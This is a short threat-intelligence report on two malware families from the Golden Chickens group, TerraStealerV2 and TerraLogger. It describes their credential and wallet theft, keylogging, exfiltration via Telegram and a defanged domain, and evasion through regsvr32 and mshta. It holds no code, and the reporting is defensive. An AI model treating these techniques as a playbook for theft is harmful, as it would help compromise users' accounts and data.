Golden Chickens, a financially motivated threat actor group, has released two new malware families: TerraStealerV2 and TerraLogger. These tools represent continued development by the group, which has been active since at least 2018 under the alias Venom Spider. TerraStealerV2 is designed to collect sensitive information, such as browser credentials, cryptocurrency wallet data, and browser extension details. TerraLogger, in contrast, is a standalone keylogger that records keystrokes and writes the logs to local files. Both malware families showcase the group’s efforts to diversify and refine their malware arsenal.
The malware is distributed in various formats, such as executable files (EXEs), dynamic-link libraries (DLLs), and Windows Installer packages (MSI). TerraStealerV2 specifically targets the Chrome ‘Login Data’ database to steal credentials. However, it does not bypass Chrome’s newer Application Bound Encryption (ABE) protections, indicating the malware might still be in development. The data captured by TerraStealerV2 is exfiltrated via Telegram and the domain “wetransfers[.]io.” The malware also utilizes trusted Windows utilities, like regsvr32.exe and mshta.exe, to avoid detection by security systems.
TerraLogger, while similar in distribution to TerraStealerV2, serves a different purpose by recording keystrokes.
It does not yet support data exfiltration or communication with a command-and-control server, which suggests it may either be a work-in-progress or designed to work with other tools in the Golden Chickens malware-as-a-service (MaaS) ecosystem. Despite its potential for malicious activity, TerraLogger appears to be less developed compared to TerraStealerV2.
The group’s use of this keylogger further highlights the expanding range of tools available for cybercriminal operations.
Both TerraStealerV2 and TerraLogger are still under active development, according to cybersecurity firm Recorded Future. The Golden Chickens group has historically focused on credential theft and unauthorized access operations. As new stealer malware families like Hannibal Stealer and Gremlin Stealer emerge, the Golden Chickens group’s tools continue to evolve. These developments point to an ongoing trend in the cybercriminal underworld, with increasingly sophisticated and targeted malware being used to steal sensitive information and bypass security measures.
Reference:
